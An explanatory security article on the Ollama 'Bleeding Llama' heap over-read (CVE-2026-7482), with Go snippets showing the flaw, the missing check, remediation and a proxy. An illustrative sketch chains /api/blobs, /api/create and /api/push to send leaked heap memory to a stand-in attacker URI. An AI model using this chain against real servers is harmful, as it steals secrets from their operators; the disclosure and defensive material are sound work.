Intro

In the race to adopt artificial intelligence, many users have turned to Ollama as a "privacy shield." By running Large Language Models (LLMs) like Llama 3 locally, organizations aim to keep their sensitive data away from the cloud-based eyes of Big Tech. It is a relatable scenario: download the software, pull a model, and enjoy the security of a private, effectively air-gapped environment.

However, a critical vulnerability has turned this privacy promise into a sieve. Dubbed "Bleeding Llama" (CVE-2026-7482) and carrying a critical-severity CVSS score of 9.3, this heap out-of-bounds read vulnerability allows unauthenticated attackers to read data straight out of the server's process memory. What was meant to be a secure local vault is now, in many cases, an open window.

The scale of the problem is staggering. Nearly 300,000 servers globally are currently exposed, potentially leaking the very secrets they were installed to protect.

When Performance Trumps Safety

Ollama is written in Go, a programming language often praised for its built-in memory safety. In a typical Go environment, an attempt to read memory outside of an assigned buffer would cause the program to "panic" and crash rather than leak data. This creates a dangerous false sense of security for developers who assume the language itself prevents these types of bugs.
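
To make that concrete, the toy snippet below shows what idiomatic Go does when code tries to read one element past a buffer: the runtime bounds check fires and the program panics rather than handing back neighboring memory.

```go
package main

import "fmt"

func main() {
	buf := make([]byte, 4) // a 4-byte buffer

	// Reading inside the buffer is fine.
	fmt.Println(buf[3])

	// Reading one element past the end does not leak adjacent memory:
	// the runtime bounds check fires and the program panics with
	// "index out of range [4] with length 4".
	fmt.Println(buf[4])
}
```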

The "Bleeding Llama" vulnerability exists because developers often trade safety for speed. To optimize AI performance, specifically within the GGUF parsing logic, Ollama uses an "escape hatch" that bypasses Go's standard memory protections.

"The answer is the unsafe package. Go gives developers an escape hatch for low-level memory operations, and as the name suggests, all the usual safety guarantees go out the window. Unsurprisingly, the one place Ollama uses unsafe is exactly where this vulnerability lives."

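As a hedged sketch of what that escape hatch makes possible (illustrative only, not Ollama's actual parsing code), the snippet below rebuilds a slice from a raw pointer using a length taken from untrusted metadata. Nothing ties that length to the real buffer, so reads can wander into neighboring heap memory; the viewAsUint16 helper is a hypothetical stand-in for that pattern.

```go
package main

import (
	"fmt"
	"unsafe"
)

// viewAsUint16 is a hypothetical helper in the spirit of the vulnerable pattern:
// it reinterprets raw bytes as 16-bit elements using a length taken from file
// metadata rather than from the buffer itself.
func viewAsUint16(data []byte, declaredElems int) []uint16 {
	// With the unsafe package, nothing ties declaredElems to len(data).
	// If the metadata declares more elements than the buffer holds, the
	// resulting slice silently covers adjacent heap memory.
	return unsafe.Slice((*uint16)(unsafe.Pointer(&data[0])), declaredElems)
}

func main() {
	payload := []byte{1, 2, 3, 4} // only 2 real uint16 elements

	// The declared length comes from (attacker-controlled) metadata.
	view := viewAsUint16(payload, 8) // claims 8 elements = 16 bytes

	// The extra elements are whatever happens to sit next to payload on the
	// heap; depending on layout this prints garbage or, if unlucky, crashes.
	fmt.Println(view)
}
```
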
The GGUF Validation Gap

The core of the vulnerability lies in how Ollama processes GGUF files, the standard format used to store and run local models. These files contain "tensors" — multi-dimensional arrays of numbers that act as the model's "brain." Because GGUF is a binary format, Ollama must parse the metadata to understand how to read the data inside.

The parser fails to validate a critical field: the tensor's declared shape. An attacker can craft a GGUF file claiming a tensor is massive (1 million elements, say) while the actual data provided in the file is tiny. Because the system doesn't verify this claim, it blindly follows the metadata, reading past the end of the buffer and into the server's heap memory.
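
The missing check is simple to describe. Below is a hedged sketch (illustrative, not Ollama's code) of the validation the vulnerable path skipped: derive the byte size implied by the declared shape and reject the tensor if the file does not actually contain that much data. The validateTensor helper and its parameters are assumptions for illustration.

```go
package main

import "fmt"

// validateTensor derives the byte size a tensor *should* occupy from its
// declared shape and element size, and rejects the file if the available
// data is shorter than that claim.
func validateTensor(shape []uint64, elemSize uint64, available uint64) error {
	elems := uint64(1)
	for _, dim := range shape {
		// A real parser would also guard against multiplication overflow here.
		elems *= dim
	}
	need := elems * elemSize
	if need > available {
		return fmt.Errorf("tensor claims %d bytes but only %d are available", need, available)
	}
	return nil
}

func main() {
	// Attacker declares 1,000,000 F16 elements (2 bytes each) but ships only 64 bytes.
	err := validateTensor([]uint64{1_000_000}, 2, 64)
	fmt.Println(err) // the check the vulnerable path was missing
}
```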

To ensure the stolen data isn't corrupted along the way, attackers use a clever "lossless conversion" trick. By setting the source tensor type to F16 and requesting an F32 target format, the attacker guarantees the heap data stays perfectly readable: converting F16 to F32 is mathematically lossless, so the sensitive memory lands on the attacker's disk exactly as it existed in the server's RAM.
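
To see why that works, here is a small, self-contained sketch of an IEEE-754 binary16 (F16) to binary32 (F32) conversion. Every 16-bit input pattern maps to a distinct 32-bit output with no rounding, so the widening step preserves the leaked bytes exactly; the half2float helper below is illustrative, not Ollama's conversion code.

```go
package main

import (
	"fmt"
	"math"
)

// half2float converts an IEEE-754 binary16 bit pattern to a float32.
// The mapping is exact and injective: no two half values collapse to the
// same float32, so the widening step destroys none of the leaked bytes.
func half2float(h uint16) float32 {
	sign := uint32(h>>15) & 1
	exp := uint32(h>>10) & 0x1F
	mant := uint32(h) & 0x3FF

	var bits uint32
	switch {
	case exp == 0 && mant == 0: // signed zero
		bits = sign << 31
	case exp == 0: // subnormal half: renormalize into a normal float32
		e := uint32(113) // float32 bias 127 - half bias 15 + 1
		for mant&0x400 == 0 {
			mant <<= 1
			e--
		}
		bits = sign<<31 | e<<23 | (mant&0x3FF)<<13
	case exp == 0x1F: // Inf or NaN
		bits = sign<<31 | 0xFF<<23 | mant<<13
	default: // normal half; +112 = float32 bias 127 - half bias 15
		bits = sign<<31 | (exp+112)<<23 | mant<<13
	}
	return math.Float32frombits(bits)
}

func main() {
	// A few "leaked" 16-bit heap patterns survive the conversion intact:
	for _, h := range []uint16{0x3C00, 0x4248, 0x0001, 0xFBFF} {
		fmt.Printf("%#04x -> %v\n", h, half2float(h))
	}
}
```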

The Bottom Line: Ollama's failure to validate declared tensor sizes against actual file lengths allows a crafted GGUF to "over-read" the heap, while a specific precision-conversion trick keeps the stolen data intact and readable.

A 3-Step Path to Exfiltration

Finding a way to read memory is one thing; getting that data off a secured server is another. Attackers have discovered a surprisingly efficient three-step process to exfiltrate leaked data using Ollama's own built-in features, all without needing a single password. (A sketch of what these requests might look like follows the list.)

  1. Staging the Malicious File: The attacker uploads a crafted, malicious GGUF file to the server via the /api/blobs endpoint.
  2. Triggering the Out-of-Bounds Read: Using the /api/create endpoint, the attacker forces the server to process the file. This triggers the read of the heap memory, which is then bundled into a "new" model file stored on the server.
  3. Exploiting the URI Parser: The attacker calls the /api/push endpoint. By exploiting a lack of validation, the attacker sets the model name to an HTTP URI (e.g., http://attacker-server.com/stolen_data). Ollama's parser treats this URI as the destination and happily uploads the model—and the stolen heap secrets—directly to the attacker.
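
In practice, the three steps above amount to three plain HTTP requests against Ollama's API. The sketch below is purely illustrative: the target host, digest placeholder, and JSON field names are assumptions rather than a working exploit, and the crafted GGUF itself is elided.

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
)

// post fires one request and prints the status; error handling is kept
// minimal because this is an illustration, not an exploit tool.
func post(url, contentType string, body []byte) {
	resp, err := http.Post(url, contentType, bytes.NewReader(body))
	if err != nil {
		fmt.Println(url, "->", err)
		return
	}
	defer resp.Body.Close()
	fmt.Println(url, "->", resp.Status)
}

func main() {
	target := "http://victim-ollama:11434" // hypothetical exposed instance

	// Step 1: stage the crafted GGUF via /api/blobs. The digest in the URL is
	// the SHA-256 of the uploaded file; the body is the raw GGUF bytes (elided).
	crafted := []byte("...crafted GGUF bytes with an inflated tensor shape...")
	post(target+"/api/blobs/sha256:<digest-of-crafted-file>",
		"application/octet-stream", crafted)

	// Step 2: have the server build a model from that blob via /api/create,
	// which exercises the vulnerable parsing path and bakes leaked heap memory
	// into the resulting model. (The JSON fields are illustrative, not an
	// exact Ollama payload.)
	post(target+"/api/create", "application/json",
		[]byte(`{"model": "exfil", "files": {"model.gguf": "sha256:<digest-of-crafted-file>"}}`))

	// Step 3: "push" the model via /api/push. Because the destination is
	// derived from the unvalidated model name, an HTTP URI pointing at the
	// attacker's server becomes the upload target for the stolen heap data.
	post(target+"/api/push", "application/json",
		[]byte(`{"model": "http://attacker-server.com/stolen_data"}`))
}
```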

Crucially, because Ollama lacks default authentication, an attacker can execute these steps with no credentials whatsoever. They don't need to be on your network; they just need your IP address.

Stealing the Keys to the Kingdom

When we think of leaked memory, we often imagine recent chat logs. While user prompts are certainly at risk, the "Bleeding Llama" leak is far more invasive. Research has shown that the heap memory often contains environment variables, system prompts, and even sensitive API keys or tokens used by the host machine.

The risk increases significantly for developers using modern AI agent tools like Claude Code. When these tools are connected to a vulnerable Ollama server, the outputs from various local tools — which might include proprietary code, database schemas, or internal configurations — also flow through the heap memory.

This means an attacker isn't just reading your conversation with a chatbot. They are potentially harvesting the environment variables and tool outputs that form the backbone of your entire development infrastructure.

The 0.0.0.0 Dilemma: 300,000 Open Windows

The reach of this vulnerability represents a systemic risk for enterprises. Ollama has recorded over 100 million downloads on Docker Hub and roughly 170,000 stars on GitHub, making it the de facto standard for local AI.

The primary driver of this risk is the software's default configuration. Out of the box, Ollama listens on all network interfaces (0.0.0.0) and requires no authentication. This "plug-and-play" ease of use has left roughly 300,000 servers sitting on the public internet, ready to be queried and drained by anyone with an internet connection.
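
If you operate Ollama yourself, a quick probe makes the exposure tangible. The sketch below simply asks the standard, unauthenticated /api/version endpoint for a reply; the host argument is a placeholder, and a successful response from outside your network means the instance is one of those open windows.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"time"
)

// A quick self-check: if this request succeeds from outside your network
// without any credentials, the instance is publicly exposed.
func main() {
	if len(os.Args) < 2 {
		fmt.Println("usage: probe <host>")
		return
	}
	host := os.Args[1]
	client := &http.Client{Timeout: 5 * time.Second}

	// /api/version is a standard, unauthenticated Ollama endpoint on the
	// default port 11434.
	resp, err := client.Get(fmt.Sprintf("http://%s:11434/api/version", host))
	if err != nil {
		fmt.Println("not reachable:", err)
		return
	}
	defer resp.Body.Close()

	body, _ := io.ReadAll(resp.Body)
	fmt.Printf("exposed: %s %s\n", resp.Status, body)
}
```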

A Timeline of Urgency

The path from discovery to a fix was marked by significant friction between security researchers and the authorities responsible for documenting these risks.

  • February 2, 2026: Vulnerability first reported to Ollama.
  • February 25, 2026: Ollama acknowledged the bug but asked the researchers to submit the CVE independently.
  • February 26, 2026: Researchers issued an urgent warning: releasing a fix without a public security advisory would leave users unaware of the danger, essentially providing a roadmap for attackers while leaving defenders in the dark.
  • March–April 2026: Delays with MITRE forced researchers to seek a third-party authority (Echo) to assign the CVE.
  • May 1, 2026: CVE-2026-7482 was finally published to the world.

Closing: The Road to AI Readiness

The "Bleeding Llama" vulnerability serves as a stark reminder that "local" does not automatically mean "secure." For organizations to safely integrate AI, they must move beyond default configurations. Immediate remediation requires updating to Ollama version 0.17.1 or higher.

Beyond patching, the roadmap to AI readiness must include network segmentation and the use of authentication proxies or firewalls to shield these servers from the public web. Simply put, if your AI server is listening to the whole world without a password, you aren't running a private service; you're running a data-leak-as-a-service.
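
As one illustration of the "authentication proxy" idea, here is a minimal sketch rather than a hardened implementation: Ollama stays bound to the loopback interface, and a small Go reverse proxy that demands a bearer token is the only thing facing the network. The OLLAMA_PROXY_TOKEN variable and the listening port are hypothetical choices.

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
)

// A minimal authenticating reverse proxy in front of a local Ollama instance.
// Ollama itself listens only on 127.0.0.1; this proxy faces the network and
// rejects any request that lacks the shared bearer token.
func main() {
	token := os.Getenv("OLLAMA_PROXY_TOKEN") // hypothetical shared secret
	if token == "" {
		log.Fatal("OLLAMA_PROXY_TOKEN must be set")
	}

	upstream, _ := url.Parse("http://127.0.0.1:11434")
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := r.Header.Get("Authorization")
		if subtle.ConstantTimeCompare([]byte(got), []byte("Bearer "+token)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})

	log.Fatal(http.ListenAndServe(":8443", handler))
}
```

Pairing something like this with Ollama's own OLLAMA_HOST setting pointed at 127.0.0.1, plus a firewall rule in front, keeps the model server off the public internet entirely.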

As we race to integrate local AI for privacy, are we inadvertently building the most efficient data-exfiltration machines the world has ever seen?